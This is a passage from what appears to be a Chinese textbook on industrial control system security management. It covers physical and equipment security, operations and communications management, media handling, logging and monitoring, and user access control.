护可以通过在组织机构边界和控制系统设施周围设置一个或多个物理屏障来实现。多个屏 障的使用将提供附加保护, 一个屏障失效不会立即危及到信息安全。 一个安全区域可以是一个可上锁的房间,或是被连续的内部物理安全屏障包围的几个 区域。在安全边界内具有不同安全要求的区域之间需要控制物理访问的附加屏障和周边。 具有多个组织机构的建筑物应考虑专门的物理访问安全。 2. 物理入口控制 安全区域必须由合适的人员控制和保护,以确保只有授权人员才允许访问。 物理入口控制需要考虑以下两点: (1)记录访问者进入和离开的日期和时间,所有的访问者要进行监督,除非他们的访 问事先已经经过批准。只允许他们访问特定的、已授权的目标,并要向他们宣布关于该区 域安全要求和应急规程的说明。 (2)访问处理敏感信息或储存敏感信息的区域要受到控制,并且仅限于已授权的人 员;鉴别控制(如访问控制卡加个人识别号)应用于授权和确认所有访问;所有访问的审 核踪迹要安全地加以维护。 所有雇员、承包方人员和第三方人员,以及所有访问者要佩戴某种形式的可视标识, 如果遇到无人护送的访问者和未佩戴可视标识的人员要立即通知保安人员。 只有在需要时,第三方支持服务人员才能有限制地访问安全区域或敏感控制系统,并 且这种访问要被授权并受到监视。 应定期进行评审和更新安全区域的访问权,必要时也可废除安全区域的访问权。 3. 办公室、房间和设施的安全保护 办公室、房间和设施必须设计并采取安全措施。 为保护办公室、房间和设施,要考虑相关的健康与安全法规和标准。关键设施要坐落 在可避免公众进行访问的场地。如有可能,建筑物不要引人注目,用不明显的标记给出其 用途的最少指示,以标识信息活动的存在。此外,标识敏感控制系统位置的目录和内部电 话簿不要轻易被公众拿到。 4. 外部和环境威胁的安全防护 为防止火灾、烟雾、粉尘、洪水、地震、爆炸、社会动荡和其他形式的自然或人为灾 难引起的破坏,应设计和采用物理保护措施。 应考虑任何邻近区域所带来的安全威胁,如屋顶漏水或地下室地板渗水、街上或操作 区域爆炸等。 为避免火灾、烟雾、粉尘、洪水、地震、爆炸、社会动荡和其他形式的自然灾难或人 为灾难的破坏,危险或易燃材料要在离安全区域安全距离以外的地方存放,大批供应品 (如文具)不要存放于安全区域内。基本维持运行的设备和备份介质的存放地点要与主要 场所有一段安全距离,避免影响主要场所的灾难产生破坏。要提供适当的灭火设备,并放 在合适地点。 5. 在安全区域工作 在安全区域工作,应设计和应用物理保护和指南。 在安全区域工作要考虑下列两点: (1)只在有必要知道的基础上,员工才能知道安全区域的存在或其中的活动。 (2)为了安全和减少恶意活动的机会,均要避免在安全区域内进行不受监督的工作。 未使用的安全区域在物理上应上锁并定期核查。 除非授权,否则不允许携带摄影、视频、音频或其他记录设备,如照相机等。 安全区域工作的安排应包括对工作在安全区域内的雇员、承包方人员和第三方人员, 以及对其他发生在安全区域内第三方活动的控制。 6. 公共访问、交接区安全 应对访问点和未授权人员可进入办公场所的其他点加以控制,若有可能,应与控制系 统隔离,避免未授权访问。 进入交接区的访问要局限于已标识的和已授权的人员,当内部门打开时,外部门要得 到安全保护。物资进入前要检查是否存在潜在威胁。进来的物资要按照资产管理规程在场 所入口处进行登记。若有可能,进入和运出的货物要在物理上予以隔离。 6.6.2 设备安全 设备安全的目标是防止设备资产丢失、损坏、失窃或危及资产安全,以及相关组织机 构活动的中断。 设备应被保护,免受物理的和环境的威胁。 对设备的保护包括离开组织机构使用设备和财产移动设备,是减少未授权访问信息风 险和防止丢失或损坏所必需的。要考虑设备的安置和处置。需要专门用来防止物理威胁及 防护支持性设施,如供电和电缆设施。 1. 设备的安置和保护 设备应被安置或保护,以减小由环境威胁和危险所造成的各种风险,以及未授权访问 的机会。 为保护设备,要对其进行适当安置,以尽量减少不必要的对工作区域的访问。要把处 理敏感数据的控制系统放在适当的限制观测的位置,以减小在其使用期间信息被窥视的风 险,还要保护储存设施以防止未授权访问。 第6章 工业控制系统信息安全管理体系 需要专门保护的部件要隔离,以降低所要求的总体保护等级;需要采取控制措施以最 小化潜在物理威胁的风险,如偷窃、火灾、爆炸、烟雾、水(或供水故障)、尘埃、振 动、化学影响、电源干扰、通信干扰、电磁辐射和故意破坏;需要建立在控制系统附近进 食、喝饮料和抽烟的指南;对于可能对控制系统运行状态产生负面影响的环境条件要予以 监视;所有建筑物都要采用避雷保护,所有进入的电源和通信线路都要装配雷电保护过滤 器;对于工业环境中的设备,要考虑使用专门的保护方法,如键盘保护膜;需要保护处理 敏感信息的设备,以最小化因辐射而导致信息泄露的风险;要对设备的增加、移除和处置 建立程序并进行审核。 2. 支持性设施 应保护设备使其免于由支持性设施的失效而引起电源故障和其他中断。 支持性设施应确保足够,如电、水、加热/通风装置和空调,以支持工业控制系统。 支持性设施应定期检查并适当测试,以确保其正常工作和减小由于它们的故障或失效带来 的风险。应按照设备制造商的说明提供合适的供电。 实现连续供电的选项包括多路供电,以避免供电的单一故障点。对支持关键业务操作 的设备,推荐使用支持有序关机或连续运行的不间断电源 (UPS) 。 电源应急响应计划要 包括 UPS 故障时要采取的措施。如果电源故障延长,而处理要继续进行,则考虑备用发 电机。要提供足够的燃料供给,以确保在延长的时间内发电机可以进行工作。UPS 设备和 发电机应定期核查、以确保它们拥有足够能力,并按照制造商的建议进行定期测试。另 外,应考虑使用多路电源,或者如果办公场所很大,则考虑使用一个独立的变电站。 应急电源开关应位于设备房间应急出口附近,以便紧急情况时快速切断电源。 一旦主 电源出现故障,应提供应急照明。 连接到设施提供商的通信设备至少有两条不同线路,以防止在一条连接路径发生故障 时语音服务失效。要有足够的语音服务以满足国家法律对于应急通信的要求。 此外,要有稳定和足够的供水以支持加湿设备和灭火系统。供水系统的故障可能破坏 设备或阻止有效灭火。若有需要,要评价和安装报警系统来检测支持性设施的故障。 3. 布线安全 传输数据或支持信息服务的电源布线和通信布线,应保证免受窃听或损坏。 出于布线安全考虑,进入控制系统的电源和通信线路应敷设在地下,网络布线要免受 未授权窃听或损坏。 为了防止干扰,电源电缆要与通信电缆分开,使用清晰的、可识别的电缆和设备记 号,以使处理差错最小化。要使用文件化配线列表减小出错的可能性。 对于敏感的或关键的系统,要考虑更进一步的控制措施,包括在检查点和终结点处安 装铠装电缆管道和上锁的房间或盒子;使用可替换的路由选择和/或传输介质,以提供适 当的安全性;使用光缆;使用电磁防辐射装置保护电缆;对于电缆连接的未授权装置要主 动实施技术清除和物理检查;控制对配线盘和电缆室的访问。 4. 设备维护 应对设备进行正确的维护,以确保其持续的可用性和完整性。 对于设备维护,要按照供应商推荐的服务时间间隔和规范对设备进行维护,只有已授 权的维护人员才可对设备进行修理和服务,要保存所有可疑的或实际的故障及所有预防和 纠正维护的记录。 当对设备安排维护时,要实施适当的控制,并考虑维护是由场所内部人员执行还是由 组织机构外部人员执行;必要时,敏感信息要从设备中删除或维护人员要是足够可靠的。 保险策略所施加的所有要求必须遵守。 5. 组织机构场所外设备安全 对组织机构场所外设备应采取安全措施,要考虑工作在组织机构场所外的不同风险。 无论责任人是谁,在组织机构场所外使用任何控制系统都要通过管理层授权。 对于离开场所的设备的保护,离开建筑物的设备和介质不要放置在公共场所,应有必 要的看管措施;制造商的设备保护说明要始终加以遵守,例如,防止暴露于强电磁场内; 远程工作的控制措施要根据风险评估确定,要施加合适的控制措施;要有足够的安全保障 掩蔽物,以保护离开办公场所的设备。 安全风险在不同场所可能有显著不同,例如,损坏、盗窃和截取要考虑确定最合适的 控制措施。 用于远程工作或从正常工作地点运走的信息存储和处理设备包括所有形式的个人计算 机、管理设备、移动电话、智能卡、纸张或其他形式的设备。 关于保护移动设备其他方面的更多安全信息可以在6.8.7节中找到。 6. 设备的安全处置或再利用 应对包含存储介质的设备的所有项目进行核查,以确保在处置之前,任何敏感信息和 注册软件已被删除或安全地写覆盖。 包含敏感信息的设备在物理上要予以摧毁,或者采用使原始信息不可获取的技术破 坏、删除或写覆盖,而不能采用标准的删除或格式化功能。 包含敏感信息的已损坏的设备可能需要实施风险评估,以确定这些设备是否要进行销 毁,而不是送去修理或丢弃。 此外,信息可能通过对设备的草率处置或重用而被泄露。 7. 资产移动 在授权之前,设备、信息或软件不应带出组织机构场所。 在未经事先授权的情况下,不要让设备、信息或软件离开组织机构场所。要明确识别 有权允许资产移动而离开办公场所的雇员、承包方人员和第三方人员。要设置设备移动的 时间限制,并在返还时执行符合性核查。若必要且合适,要对设备做移出记录,当返回 时,要做送回记录。执行检测未授权资产移动的抽查,以检测未授权的记录装置、设备等,防止它们进入 组织机构场所。这些抽查要按照相关法律和规章执行。要让每个人都知道将进行抽查,并 且只能在法律法规要求的适当授权下执行核查。 6.7 通信与操作管理 工业控制系统信息安全通信与操作管理需要考虑操作规程和职责、第三方服务交付管 理、系统规划和验收、防范恶意和移动代码、备份、网络安全管理、介质处置、信息交 换、电子商务服务、监视等。 6.7.1 操作规程和职责 操作规程和职责的目标是确保对控制系统进行正确、安全的操作。 所有控制系统的管理与操作的职责和规程应建立,包括制定合适的操作规程。 在合适的地方,应实施责任分割,减小疏忽或故意误用系统的风险。 1. 文件化操作规程 操作规程应形成文件,并对所有需要的用户可用。 与控制系统相关的系统活动应具备形成文件的规程,如控制站的启动和关闭规程、备 份、设备维护、介质处理、控制室和网络管理、系统升级和更新及安全。 操作规程应详细规定执行每项工作的说明,包括信息处理和处置、备份、时间安排、 对可能出现处理差错或其他异常情况的指导、支持性联络、特定输出及介质处理的指导、 系统失效时使用的系统重启和恢复规程、系统日志管理等。 2. 变更管理 对控制系统设施和系统的变更必须加以控制。 控制系统应有严格的变更管理控制,特别要考虑重大变更的标识和记录、变更的策划 和测试、变更潜在影响的评估、变更批准规程、传达变更细节、基本维持运行等。 3. 责任划分 应对各类责任及职责范围进行划分,以降低未授权或无意识的修改,或者不当使用组 织机构资产的机会。 责任划分是一种减小意外或故意系统误用风险的方法。在无授权或未被检测时,要注 意个人不能访问、修改或使用资产。事件的启动要与其授权分离。共谋的可能性应在设计 控制措施时加以考虑。 4. 开发、测试和运行设施分离 应分离开发、测试和运行设施,以减小未授权访问或改变运行系统的风险。 为防止运行问题,应识别运行、测试和开发环境之间的分离级别,并实施适当的控制 措施。 6.7.2 第三方服务交付管理 第三方服务交付管理的目标是实施和保持符合第三方服务交付协议的信息安全和服务 交付的适当水准。 对于第三方服务交付,组织机构应核查协议的实施、监视协议执行的符合性,并管理 变更,以确保交付的服务满足与第三方商定的所有要求。 1. 服务交付 第三方应确保实施、运行和保持包含在第三方服务协议中的安全控制措施、服务定义 和交付水准。 第三方服务交付应包括商定的安全安排、服务定义和服务管理的各方面。在外包安排 的情况下,组织机构应策划必要的过渡(信息、控制系统和其他需要移动的任何资产), 并确保在整个过渡期间保持信息安全。 组织机构要确保第三方保持足够的服务能力和可使用的计划,以确保商定的服务连续 性水平在主要服务故障或灾难后继续保持。 2. 第三方服务的监视和评审 第三方提供的服务、报告和记录必须定期监视和评审,第三方服务的审核也应定期 执行。 第三方服务的监视和评审要确保坚持协议的信息安全条款和条件,并且信息安全事件 和问题得到适当管理。 3. 第三方服务的变更管理 第三方服务提供的变更应管理,包括保持和改进现有的信息安全策略、规程和控制措 施,并考虑业务系统和涉及过程的关键程度及风险的再评估。 对第三方服务变更的管理过程,需要考虑组织机构和第三方服务实施的变更。组织机 构实施的变更应做到对提供的现有服务的加强、任何新应用和系统的开发、组织机构策略 和规程的更改或更新,解决信息安全事件和改进安全的新的控制措施等。第三方服务实施 的变更应做到对网络的变更和加强、新技术的使用、新产品或新版本的采用、新的开发工 具和环境等。 第6章 工业控制系统信息安全管理体系 6.7.3 系统规划和验收 系统规划和验收的目标是将系统失效的风险降至最低。 为了达到足够容量和资源的可用性以提供所需的系统性能,需要进行预先规划和准 备,并做出对于未来容量需求的推测,以减小系统过载的风险。新系统的运行要求应在验 收和使用之前建立、形成文件并进行测试。 1. 容量管理 应监视、调整资源的使用,并做出对于未来容量要求的预测,以确保拥有所需的系统 性能。 应识别每一个新的和正在进行的活动的容量要求;应使用系统调整和监视以确保和改 进系统的可用性和效率;应有检测控制措施来及时指出问题;对未来容量要求的推测要考 虑新业务、系统的要求,以及组织机构控制系统能力的当前和未来的趋势。 特别需要关注与长订货交货周期或高成本相关的所有资源。管理人员要监视关键 系统资源的利用,要识别出使用的趋势,特别是与业务应用或管理信息系统工具相关 的使用。 管理人员使用该信息来识别和避免可能威胁到系统安全或服务的潜在瓶颈,以及对关 键员工的依赖,并策划适当的措施。 2. 系统验收 新控制系统升级及新版本的验收准则应建立,并且在开发中和验收前对系统进行适当 的测试。 管理人员要确保验收新系统的要求和准则已明确定义、商定、形成文件并经过测试。 新控制系统升级和新版本只有在获得正式验收后,才能进入生产环节。 6.7.4 防范恶意代码和移动代码 防范恶意和移动代码的目标是保护软件和信息的完整性。 防范恶意和移动代码要求有预防措施,以防范和检测恶意代码或未授权移动代码的 引入。 控制系统软件和设施易感染恶意代码,如计算机病毒、网络蠕虫、特洛伊木马和逻辑 炸弹等。 用户需要了解恶意代码的威胁。若合适,管理人员应引入控制措施,以防范、检测并 删除恶意代码,并控制移动代码。 1. 控制恶意代码 应实施恶意代码检测、预防和恢复的控制措施,并且实施适当的用户安全意识的规程。 防范恶意代码基于恶意代码检测和修复软件、安全意识、适当的系统访问和变更管理 控制措施。 2. 控制移动代码 对授权使用移动代码,其配置应确保授权的移动代码按照清晰定义的安全策略运行, 阻止执行未授权的移动代码。 移动代码是一种软件代码,它能从一台计算机传递到另一台计算机,随后自动执行并 在很少或没有用户干预的情况下完成特定功能。移动代码与大量的中间件服务有关。 除确保移动代码不包含恶意代码外,控制移动代码是必要的,以避免系统、网络或应 用资源的未授权使用或破坏,以及其他信息安全违规。 6.7.5 备份 备份的目标是保持信息和控制系统设施的完整性及可用性。 对备份数据和演练及时恢复建立例行规程,实施已商定的备份方针和策略。 应按照已商定的备份策略,定期备份、测试信息和软件。 应提供足够的备份设施,以确保所有必要信息和软件能在灾难或介质故障后进行 恢复。 6.7.6 网络安全管理 网络安全管理的目标是确保网络中信息的安全性并保护支持性的基础设施。 对于可能跨越组织机构边界的网络安全管理,需要仔细考虑数据流、法律含义、监视 和保护,还可以要求额外控制,以保护在公共网络上传输的敏感数据。 1. 网络控制 控制系统网络应充分管理和控制,防止威胁的发生,维护使用网络的系统和应用程序 的安全,包括传输中的信息。 网络管理员应实施控制,以确保网络上的信息安全、防止未授权访问链接服务。 2. 网络服务安全 应确定安全特性、服务级别,以及所有网络服务的管理要求,并包括在所有网络服务 协议中,无论这些服务是由内部提供的还是外包的。 要确定网络服务提供商以安全方式管理商定服务的能力并定期监视,还要商定审核的 权利。 第6章 工业控制系统信息安全管理体系 特殊服务的安全安排要进行识别,如安全特性、服务级别和管理要求。组织机构要确 保网络服务提供商实施了这些措施。 网络服务包括接入服务、私有网络服务、增值网络和受控网络安全解决方案,如防火 墙和入侵检测系统。这些服务由简单的未受控的带宽延伸到复杂的增值网络提供。 6.7.7 介质处理 介质处理的目标是防止资产遭受未授权泄露、修改、移动或销毁,以及业务活动的 中断。 介质应受到控制和物理保护。 应建立适当的操作规程,以保护文件、计算机介质(如磁带、磁盘)、输入/输出数据 和系统文件免遭未授权泄露、修改、删除和破坏。 1. 可移动介质管理 组织机构应有适当的可移动介质的管理规程。 在工业控制系统中,可移动介质通常包括磁带、磁盘、闪盘、可移动硬件驱动器、 CD 、DVD 及打印介质。 对于可移动介质的管理,应进行适当考虑。对于从组织机构取走的任何可重用介质中 的内容,如果不再需要,要处理使其不可恢复。如果必要且可行,对于从组织机构取走的 所有介质要求授权,所有这种移动的记录要加以保持,以保持审核踪迹。另外,所有介质 要存储在符合制造商规定的安全、保密环境中。如果存储在介质中的信息使用时间比介质 生命期长,则要将信息存储在别的地方,以避免由于介质老化而导致信息丢失。还有,可 移动介质的登记要考虑,以减少数据丢失的机会。在有业务要求时,才使用可移动介质, 并且可移动介质只允许在规定的安全区域内使用。此外,所有可移动介质的管理规程和授 权级别应清晰地形成文件。 2. 介质处置 对于不再需要的介质,应使用正式的规程进行可靠且安全的处置。 应建立安全处置介质的正式规程,使敏感信息泄露给未授权人员的风险减至最小。安 全处置包含敏感信息介质的规程应与信息的敏感性相一致。建议考虑下列两项: (1)包含敏感信息的介质应秘密和安全地进行存储和处置,例如,利用焚化或切碎的 方法,或者将数据删除供组织机构内其他应用使用。 (2)要用规程识别可能需要安全处置的项目。 所有不再需要的介质部件应收集起来并进行安全处理,这种做法比试图分离出敏感部 件可能更容易。有些组织机构对纸、设备和介质提供收集和处置服务,因此要注意选择具 有足够控制措施和经验的合适的承包方,同时处置敏感部件应做好记录,以便保持审核踪 迹。还有,当处置堆积的介质时,要考虑集合效应,此类效应可能使大量不敏感信息变成 敏感信息。此外,敏感信息可能由于粗心大意的介质处置而被泄露。 3. 信息处理及存储规程 信息处理及存储规程应建立,以防止信息的未授权泄露或不当使用。 组织机构需要制定规程来处置、处理、存储或传达与分类一致的信息。 4. 系统文件安全 系统文件要进行保护,以防止未授权访问。 为了系统文件安全,应安全地存储系统文件;应将系统文件的访问人员列表保持在最 小范围,并且由应用责任人授权;应妥善保护存储在公用网络上或经由公用网络提供的系 统文件。 6.7.8 信息交换 信息交换的目标是保持组织机构内及组织机构外信息和软件交换的安全。 组织机构之间信息和软件的交换应基于一个正式的交换策略,按照交换协议执行,并 且需服从相关法律。 组织机构应建立相应的规程和标准,以保护传输中的信息和含有信息的物理介质。 1. 信息交换策略和规程 组织机构要有正式的信息交换策略、规程和控制措施,以保护通过使用所有类型通信 设施的信息交换。 使用电子通信设施进行信息交换的规程和控制,需考虑的内容包括设计用来防止交换 信息遭受截取、复制、修改、错误寻址和破坏的规程,以及检测和防止可能通过使用电子 通信传输的恶意代码的规程。 信息交换策略和规程尽量包括:保护以附件形式传输的敏感电子信息的规程;简述电 子通信设施可接受使用的策略或指南;无线通信使用的规程,要考虑所涉及的特定风险; 雇员、承包方人员和所有其他使用人员不危害组织机构的职责,如诽谤、扰乱、扮演、连 锁信寄送、未授权购买等;密码技术的使用,如保护信息的保密性、完整性和真实性; 所有业务通信(包括消息)的保持和处理指南要与相关的国家和地方法律法规一致;不 将敏感或关键信息留在打印设施上,如复印机、打印机和传真机,因为这些设施可能被 未授权人员访问;与通信设施转发相关的控制措施和限制,如将电子邮件自动转发到外部 邮件地址。 工作人员要采取相应预防措施,例如,在打电话时,不泄露敏感信息,避免被无意听 到或窃听;不要将包含敏感信息的消息留在应答机上,因为可能会被未授权个人重放,也 不能留在公用系统或由于误拨号而被不正确存储;工作人员在使用传真机时,不要注册统 计数据,以避免未授权人员收集。现代的传真机和影印机都有页面缓存并在页面或传输故 障时存储页面, 一旦故障消除,这些将被打印。此外,工作人员不要在公众场所或开放办 公室和不隔音的会场进行保密谈话。 第6章 工业控制系统信息安全管理体系 2. 交换协议 为了在组织机构与外部组织之间交换信息和软件,应当建立交换协议。 这些交换协议应考虑以下两个安全条件: (1)控制和通知传输、分派和接收的管理职责。 (2)通知传输、分派和接收的发送者的规程。 此外,要有确保可追溯性和不可抵赖性的规程;要有打包和传输的最低技术标准;要 有条件转让契约;要有送信人标识标准;要有如果发生信息安全事件的职责和义务,如数 据丢失;要有商定的敏感标记或关键信息系统的使用方法,确保标记的含义能直接被理 解,并且信息受到适当保护;要有数据保护、版权、软件许可证符合性及类似考虑的责任 和职责;要有记录、阅读信息和软件的技术标准;为保护敏感项,可以要求任何专门的控 制措施,如密钥;要建立和保持策略、规程和标准,以保护传输中的信息和物理介质,这 些还要在交换协议中进行引用。 3. 运输中的物理介质 在组织机构的物理边界外运送包含信息的介质时,应防止这些介质的未授权访问、不 当使用或毁坏。 为保护不同地点间传输的信息介质,要使用可靠的运输或信使,授权的信使清单要经 管理层批准,要开发核查信使识别的规程,包装要足以保护信息免遭在运输期间可能出现 的任何物理损坏,并且符合制造商的规范。 若有必要,要采取专门的控制,以保护敏感信息免遭未授权泄露或修改。 在物理传输期间,如通过邮政服务或送信人传送,信息易受未授权访问、不当使用或 破坏。 4. 电子消息发送 应适当地保护包含在电子消息发送中的信息。 电子消息发送的安全考虑应包括以下两个方面: (1)防止消息遭受未授权访问、修改或拒绝服务攻击。 (2)确保正确的寻址和消息传输。 电子消息发送,要有服务的通用可靠性和可用性;在使用外部公共服务(如即时消息 或文件共享)前需获得批准;要有更强的用于控制从公开可访问网络进行访问的鉴别级 别;要有法律方面的考虑,如电子签名的要求。 电子消息,如电子邮件、电子数据交换和即时消息,在业务通信中充当一个日益重要 的角色。电子消息与基于通信的纸质文件相比有不同的风险。 5. 业务信息系统 保护与业务信息系统互联相关的信息,应建立并实施相应的策略和规程。 对于互联设施的安全和业务蕴涵应考虑如下两点: (1)信息在组织机构的不同部门间共享时,出现在管理和会计系统中已知的脆弱性。 (2)业务通信系统中信息的脆弱性,如记录电话呼叫或会议呼叫、呼叫的保密性、传 真的存储、打开的邮件、邮件的分发。 业务信息系统要有管理信息共享的策略和适当的控制措施。如果系统不提供适当级别 的保护,则排除敏感业务信息和分级文件。允许使用系统的工作人员、承包方人员或业务 伙伴的类别,以及可以访问该系统的位置,对特定类别的用户应限制在所选定的设施。应 识别出用户的身份,如组织机构的雇员或为其他用户利益的目录中的承包方人员。 业务信息系统要有系统上存放信息的保留和备份,有基本维持运行的要求和安排,有 限制访问与特定人员相关的日志信息。 办公信息系统可通过结合使用文件、计算机、移动计算、移动通信、邮件、语音邮 件、通用语音通信、邮政服务/设施和传真机,来快速传播和共享业务信息。 6.7.9 电子商务服务 电子商务服务的目标是保证电子商务服务安全及其安全使用。 与电子商务服务相关的安全包括在线交易和控制要求,这种安全应考虑。通过公共可 用系统电子排版的信息,其完整性和可用性也应当考虑。 通过公网的电子商务信息应防止欺诈性活动、合同争议,以及未授权的泄露和修改。 在线交易的信息应当保护,以防止这些信息传送不完整、发错地方、未授权消息更 改、未授权泄露、未授权消息复制或重发。 在公共可用系统中信息的完整性应当保护,防止未授权修改。 6.7.10 监视 监视的目标是检测未经授权的控制系统活动。 这些控制系统活动应监视,并记录信息安全事态,应使用操作员日志和故障日志以确 保识别出信息系统的问题。 控制系统监视应用于核查所采用控制措施的有效性,并验证与访问策略模型的一致性。 组织机构的监视和日志记录活动必须遵守相关法律的要求。 1. 审计记录 应产生记录用户活动、异常情况和信息安全事态的审计日志,并保持一个已设的周期 以支持将来的调查和访问控制监视。 审计日志在需要时应包括如下内容: (1)用户ID。 (2)日期、时间和关键事态的细节,如登录和退出。 若有可能,要有系统配置的变更;要有终端身份或位置;要有特殊权限的使用;要有 系统实用工具和应用程序的使用;要有访问的文件和访问类型;要有网络地址和协议;要 第6章工业控制系统信息安全管理体系 有成功的和被拒绝的对系统尝试访问的记录;要有成功的和被拒绝的对数据及其他资源尝 试访问的记录;要有防护系统的激活和停用,如防病毒系统和入侵检测系统;要有访问控 制系统引发的警报。 审计日志包含入侵和保密人员的数据,要采取适当的隐私保护措施。如有可能,系统 管理员不应删除或停用他们自己活动日志的权利。 2. 监视系统的使用 建立控制系统设施的监视使用规程,并经常评审监视活动的结果。 应按照风险评估,决定各个设施的监视级别。 组织机构监视系统的使用要符合相关的适用于监视活动的法律要求,需要考虑授权访 问、所有特殊权限操作、未授权访问尝试、系统报警或故障,以及改变系统的安全设置和 控制措施。 3. 日志信息的保护 应当保护记录日志的设施和日志信息,防止篡改和未授权访问。 应当实施控制措施,防止日志设施被未授权更改和出现操作问题。 4. 系统管理员和操作员日志 系统管理员和操作员的活动应记入日志。 日志内容要包括事件发生的时间、事件或故障信息。 系统管理员和操作员日志应进行定期评审。 5. 故障日志 应记录、分析故障,并采取适当措施。 对与控制系统或通信系统的问题有关的用户或系统程序所报告的故障应加以记录。对 于处置所报告的故障要有明确的规则。 6. 时钟同步 应使用已设的精确时间源对组织机构或安全域内的所有相关控制系统的时钟进行同步。 如果控制系统的计算机或通信设备有能力运行实时时钟,则应置时钟为商定的标准时 间,如世界标准时间或本地标准时间。如果已知某些时钟随时间漂移,则要有一个核查和 校准所有重大变化的规程。日期/时间格式的正确解释对确保时间戳反映实时日期/时间是 重要的。此外,还需考虑局部特殊性,如夏令时间。 设置正确的控制系统计算机时钟,确保审计记录的准确性。审计日志可用于调查或作 为法律、纪律处理的证据;不准确的审计日志可能会妨碍调查,同时也损害证据的可信 度。链接到国家原子钟无线电广播时间的时钟可用于记录系统的主时钟,通过网络时间协 议保持所有服务器与主时钟同步。 6.8 访问控 制 工业控制系统信息访问控制需要考虑访问控制业务要求、用户访问管理、用户职责、 网络访问控制、操作系统访问控制、应用和信息访问控制、移动计算和远程工作等。 6.8.1 访问控制业务要求 访问控制业务要求的目标是控制对控制系统和任何受保护信息的访问。 对控制系统、信息和业务过程的访问应在业务和安全要求的基础上加以控制。 访问控制规则应考虑信息传播、受控记录和控制系统授权策略。 访问控制策略如下: (1)应建立访问控制策略和形成文件,并根据业务和访问的安全要求进行评审。 (2)每个用户或每组用户的访问控制规则和权利应在访问控制策略中清晰地规定。访 问控制包括逻辑的和物理的,两者需要一起考虑。访问控制策略要给用户和服务提供商提 供一份清晰的满足业务要求的说明。 6.8.2 用户访问管理 用户访问管理的目标是确保授权用户访问控制系统,并防止未授权访问。 对控制系统访问权的分配应由正式的规则来控制。 这些规则应涵盖用户访问生命周期内的每个阶段,从新用户初始注册到不再需要访问 控制系统用户的最终注销。在适当的时侯,要特别注意对有特殊权限的访问权的分配加以 控制的需要,这种访问权可以使用户越过系统的控制措施。 1. 用户注册 授权和撤销对所有控制系统及服务的访问,应有正式的用户注册及注销规程。 用户注册和注销的访问控制规程应包括以下几点: (1)使用唯一用户 ID, 使得用户与其行为链接起来,并对其行为负责。在对于业务 或操作而言必要时才允许使用组 ID, 并经过批准和形成文件。 (2)核查使用控制系统的用户是否具有该系统拥有者的授权,取得管理层时访问权的 单独批准也是合适的。 用户注册,要核查所授予的访问级别是否与业务目的相适合,是否与组织机构的安全 方针保持一致。要给用户一份关于其访问权的书面声明,用户签署表示理解访问条件的声 明;要确保已经完成授权规程,服务提供者才提供访问;要维护一份注册使用该服务的所 有人员的正式记录;要立即取消或封锁工作角色或岗位发生变更或离开组织机构的用户的 访问权;要确保多余的用户 ID 不会发给其他用户;要定期核查并取消或封锁多余的用户 ID。 第6章 工业控制系统信息安全管理体系 2. 特殊权限管理 对特殊权限的分配及使用应限制和控制。 多用户系统需要防范未授权访问,应通过正式的授权过程拥有特殊权限的分配。 3. 用户口令管理 应通过正式的管理过程控制口令的分配。 为了保证个人口令的保密性和组口令仅在该组成员范围内使用,要求用户签署一份声 明,签署的声明可包括在任用条款和条件中。 如果需要用户维护自己的口令,则在初始时提供给他们一个安全的临时口令,并强制 其立即改变;在提供一个新的、代替的或临时的口令之前,要建立验证用户身份的规程; 要通过安全的方式将临时口令给予用户;要避免使用第三方或未保护的电子邮件消息;临 时口令对个人而言是唯一的、不可猜测的。 用户要确认收到口令;口令不要以未保护的形式存储在计算机系统内;要在系统或软 件安装后改变提供商的默认口令。 口令是按照用户授权赋予对控制系统的访问权之前,验证用户身份的一种常用手段。 用户标识和鉴别的其他技术,如生物特征识别(如指纹验证)、签名验证和硬件标记的使 用(如智能卡),这些技术均可用,若合适,要进行考虑。 4. 用户访问权的复查 管理层应通过正式过程对用户的访问权进行定期复查。 在用户访问权更新之后,对用户的访问权应进行复查。当用户岗位发生变化时,也要 复查和重新分配用户的访问权。 6.8.3 用户职责 用户职责的目标是防止未授权用户对控制系统及其资产访问、损害或窃取。 已授权用户的合作对实现有效的安全是非常重要的。 用户应知悉其维护有效访问控制的职责,特别是关于口令使用和用户设备的安全职责。 桌面清空策略应实施,以降低未授权访问或破坏纸、介质和控制系统的风险。 1. 口令使用 用户在选择及使用口令时,应遵循良好的安全习惯。 对于所有用户,要在初次登录时更换临时口令;要选择具有最小长度的优质口令;要 保密口令;除非可以对其进行安全存储及存储方法得到批准,否则避免保留口令的记录 (如在纸上、软件文件中或手持设备中);当有任何迹象表明系统或口令受到损害时要变更 口令;要定期或以访问次数为基础变更口令(有特殊权限的账户的口令应比常规口令更频 繁地予以变更),并且避免重新使用旧口令或周期性地使用旧口令;在任何自动登录过程(如以宏或功能键存储)中,不要包含口令;不要在业务目的和非业务目的中使用相同的 口令。 2. 无人值守的用户设备 对于无人值守的控制系统设备,用户应确保有适当的保护。 用户要了解保护无人值守设备的安全要求和规程,以及对实现这种保护所负有的职责。 3. 清洁桌面和屏幕策略 用户应采取清空桌面上文件、可移动存储介质和控制系统设施屏幕的策略。 清空桌面和屏幕策略应考虑信息分类、法律和合同要求、潜在的 HSE 问题、相应的 风险和组织机构的文化方面。当不用,特别是当离开办公室时,要将敏感或关键业务信息 锁起来(如在保险柜或保险箱,或者其他形式的安全设备中)。当无人值守时,计算机和 终端要注销,或使用由口令、令牌或类似的由用户鉴别机制控制的屏幕和键盘锁定机制进 行保护。当不使用时,要使用带钥匙的锁、口令或其他控制措施进行保护。邮件进出点和 无人值守的传真机要受到保护。要防止复印机或其他复制技术(如扫描仪、数字照相机) 的未授权使用。对包含敏感或涉密信息的文件要及时从打印机中清除。 6.8.4 网络访问控制 网络访问控制的目标是防止对网络服务的未授权访问。 应控制内部和外部网络服务的用户。 访问网络和网络服务的用户,不应损害网络服务的安全,确保在本组织机构的网络和 其他组织机构拥有的网络及公共网络之间有合适的接口;确保对用户和设备应采用合适的 鉴别机制;确保对用户访问控制系统的强制控制。 1. 网络服务策略 用户应仅能访问已获专门授权使用的服务。 应制定使用网络和网络服务的策略。 网络服务策略包括允许被访问的网络和网络服务、确定允许哪个人访问哪些网络和网 络服务的授权规程、保护访问网络连接和网络服务的管理控制措施和规程,以及访问网络 和网络服务使用的手段。 2. 外部连接的用户鉴别 对控制远程用户的访问应使用适当的鉴别方法。 远程用户的鉴别可以使用如密码技术、硬件令牌或询问/响应协议等来实现。在各种 各样的虚拟专用网络 (VPN) 解决方案中可以发现这种技术的可能实施。专线也可用来作 为连接来源的保证。 第6章 工业控制系统信息安全管理体系 3. 